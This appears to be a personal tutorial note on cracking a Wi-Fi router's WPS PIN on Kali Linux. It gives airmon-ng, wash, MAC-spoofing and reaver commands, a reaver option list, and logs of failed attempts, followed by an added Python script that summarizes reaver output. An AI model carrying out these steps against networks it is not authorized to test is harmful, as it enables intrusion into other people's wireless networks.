On the magical Kali:
sudo airmon-ng check kill
sudo airmon-ng start wlan0
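Scan for Wi-Fi networks with WPS enabled:
sudo wash -i wlan0mon      # show only networks with WPS enabled
sudo wash -i wlan0mon -a   # show all networks
Output: omitted (you know why...)
Set the card's MAC address before monitor mode is enabled:
sudo macchanger -m 00:11:22:33:44:55 wlan0
If monitor mode is already enabled, stop it first:
sudo airmon-ng stop wlan0mon
reaver PIN testing:
-i, name of the network interface that is in monitor mode
-b, BSSID of the Wi-Fi network to probe
-c, channel
-5, use 5 GHz channels
-v, show detailed information; -vv or -vvv show even more detail
-q, show only key information
-p, the PIN to use
-d, delay between PIN attempts (default 1)
-l, time to wait if the router locks out PIN attempts (default 60)
-g, maximum number of attempts; the command stops once it is reached
-x, time to wait after 10 unexpected failures (default 0)
-t, receive timeout period (default 10)
-F, ignore frame checksum errors
Run (if the PIN is already known, to get the password):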
sudo reaver -i wlan0mon -b XXXXXXX -p 01102511 -vv
To cycle through PINs:
sudo reaver -i wlan0mon -b XXXXXXXXXXXX -vv
Watch it run:
Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from XXXXXXXXXXXXXXX
[+] Switching wlan0mon to channel 11
[+] Received beacon from XXXXXXXXXXXXXXX
[+] Vendor:XXXXXX
[+] Trying pin "01102511"
[+] Sending authentication request
[+] Sending association request
[+] Associated with XXXXXXXXXXXXXXXX (ESSID: XXXX)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Then it just keeps timing out...
Try a MAC whose WPS version is 1.0:
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[... the identity request / identity response pair repeats many more times ...]
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
There is a difference, but... after many PINs it also times out...
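Added example, not part of the original post: a small Python summarizer for `reaver -vv` output like the two logs above, reporting how far the WPS exchange got when checking how your own access point responds. The sample log is constructed from message lines shown on this page; the function names and stage labels are assumptions.

```python
import re
from collections import Counter

# Constructed sample, assembled from message lines that appear in the logs above.
SAMPLE = """\
[+] Trying pin "01102511"
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
"""

EVENTS = {  # hypothetical labels -> text reaver prints
    "eapol_start": "Sending EAPOL START request",
    "timeout": "Receive timeout occurred",
    "identity_request": "Received identity request",
    "m1": "Received M1 message",
    "nack_sent": "Sending WSC NACK",
}
FAIL = re.compile(r"WPS transaction failed \(code: (0x[0-9a-fA-F]+)\)")

def split_records(text):
    """Split before every [+] / [!] marker, so a log pasted as one long line still parses."""
    return [r.strip() for r in re.split(r"(?=\[[+!]\] )", text) if r.strip()]

def summarize(text):
    counts, codes = Counter(), []
    for rec in split_records(text):
        counts.update(name for name, needle in EVENTS.items() if needle in rec)
        codes += FAIL.findall(rec)
    if counts["m1"]:
        stage = "reached M1"                 # AP answered with WPS messages
    elif counts["identity_request"]:
        stage = "EAP identity only"          # stuck in the identity loop
    elif counts["timeout"]:
        stage = "no reply to EAPOL START"    # the first log on this page
    else:
        stage = "no exchange"
    return {"counts": dict(counts), "fail_codes": codes, "stage": stage}

if __name__ == "__main__":
    print(summarize(SAMPLE))
```
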